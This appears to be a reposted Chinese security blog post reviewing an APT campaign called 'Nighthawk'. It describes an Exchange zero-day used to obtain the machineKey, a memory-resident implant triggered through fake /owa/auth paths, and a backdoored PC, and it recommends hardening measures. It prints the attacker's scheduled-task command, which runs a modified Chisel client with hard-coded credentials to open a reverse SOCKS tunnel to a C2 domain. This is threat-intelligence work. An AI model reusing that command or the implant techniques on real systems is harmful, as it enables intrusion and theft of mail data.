文章总结： 本文复盘了APT组织夜鹰的攻击活动，披露了其完整攻击路径。攻击者利用零日漏洞入侵Exchange服务器，植入内存木马以窃取邮件数据，并通过修改后的Chisel工具建立计划任务，实现对个人PC的长期控制和内网穿透。文章最后从应用、主机和网络等层面提出了安全加固措施。 综合评分： 85 文章分类： 渗透测试,APT攻击,恶意软件,应急响应,威胁情报

攻击路径(12)：夜鹰APT窃密攻击

原创

罗锦海 罗锦海

OneMoreThink

2026年3月23日 00:06 广东

本文是APT事件《独家披露美国 APT 组织”夜鹰”攻击活动[1]》的复盘笔记，欢迎大家阅读原文。

完整攻击路径

安全风险与加固措施

风险一：通过零日漏洞，获得 Exchange 的服务器权限，及其存储的所有邮件数据

由于攻击者并不知道目标单位的 Exchange 版本，因此其几乎遍历了市面上所有的版本号，才锁定了目标单位的 Exchange 版本。

攻击者通过未知 0day 漏洞，获取到了 Exchange 服务器的 machineKey，

并通过该 Key 针对 Exchange 服务器进行反序列化操作植入内存木马，其不会在磁盘内落地，从而避免被杀软或者其他工具发现。

攻击者通过内存木马，可以远程读取任意人员的邮箱数据。目标单位的所有重点目标邮件均被攻击者拖走，时间持续近一年之久。

针对应用，要部署WAF或RASP等应用安全产品；针对应用服务器，要部署HIDS或EDR等主机安全产品并开启内存木马检测功能，要收敛其内网访问权限（关注其所在网段和可达网段），要投放蜜罐诱饵；针对应用所在网段，要部署全流量（至少南北向）、蜜罐等流量安全产品。

重度使用邮件的单位，要区分内邮和外邮，即使外邮的部分邮箱或整个邮服失陷，也能避免内邮的敏感数据失窃。

由于每次攻击结束后内存中的木马程序都会自动清除，因此并未捕获到内存木马样本，但是通过天擎 EDR 的磁盘检测功能，可以定位到内存木马的加载程序。

这些加载程序用 App_Web_*.dll 的格式命名，是攻击者植入 Exchange 服务器的 IIS 服务中的 Payload 代码产生的预编译 DLL 文件，由 ASP.NET 语言编写。

（编者注：内存痕迹都自删除了，硬盘痕迹竟然没自删除？而且通过硬盘中的程序加载内存木马，应急时怎么会没找到持久化手段？

由此猜测，内存木马大概率是每次都用漏洞植入，而该内存木马加载程序很可能是早期入侵阶段未清理干净的痕迹）

不同的加载程序运行后，都会使用 WEB 目录 /owa/auth/ 下的子文件夹与文件，来创建 ~/auth/*.aspx 格式的虚拟 URL 目录（编者注：不新增 URL 从而增加隐蔽性），如：

1. ~/auth/lang/cn.aspx
2. ~/auth/lang/zh.aspx
3. ~/auth/lang/setlang.aspx
4. ~/auth/aspxver.aspx

攻击者通过请求这些虚拟 URL 目录，触发内存木马程序执行。

当内存木马程序接收到指定虚拟 URL 目录的请求后：

1. 会在 Exchange 服务器 IIS 服务已加载程序集中搜索内存木马程序集 “App_Web_Container_1”，
2. 并在该程序集中搜索恶意功能类 “App_Web_8c9b251fb5b3”，
3. 最后调用该类中的主体功能函数 “AppWebInit” 进行命令执行操作。

风险二：通过未知方式，获得个人PC的权限

通过 SOC 日志分析发现，Exchange 邮服与某台个人 PC 主机进行过交互，而这台个人 PC 每 4 个小时会 DNS 解析请求一次伪装成 NAS 服务商群晖的域名 synologyupdates.com。

查询威胁情报发现，该域名使用动态隐匿技术，在未使用期间，DNS 服务器会将域名解析到 127.0.0.1 或者 192.168.1.1 等局域网 IP，通过该手法来避免真正的服务器 IP暴露。

出网区域要实施外联行为管控，一是梳理业务需求，落实最小化访问控制要求；二是结合流量检测、威胁情报与行为分析，及时发现并处置异常外联事件。

在这台个人 PC 中，攻击者建立了每 4 个小时启动一次后门木马的计划任务，这与规律的 DNS 解析请求行为对应上了。计划任务执行的命令如下：

C:\Program Files (x86)\Synology\SynologyUpdate.exe client --auth uUsSeErR123iOttmeeeplz:pPaAsS321iOttmeeeplz --keepalive 30s --max-retry-count 3 --tls-skip-verify https://synologyupdates.com:443 R:1090:socks

SynologyUpdate.exe 是 Go 语言编译的定制化的 Chisel 家族木马，攻击者使用开源 Chisel 内网穿透工具源代码进行修改，硬编码配置了执行参数，使用指定用户名与密码，与指定 C&C 地址的 443 端口建立 Scoks 连接，并映射到 C&C 主机的指定端口（编者注：这里是1090端口），实现内网穿透功能。

（编者注：由于个人PC只发现了后门木马，没有入侵和横向痕迹，而且邮服和个人 PC 有过交互这个线索没有详情而且普遍，因此谁横向到谁还说不定呢，搞不好这是两个独立事件）

1. https://www.sohu.com/a/910657004_120932824 ↩

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：OneMoreThink 罗锦海 罗锦海《攻击路径(12)：夜鹰APT窃密攻击》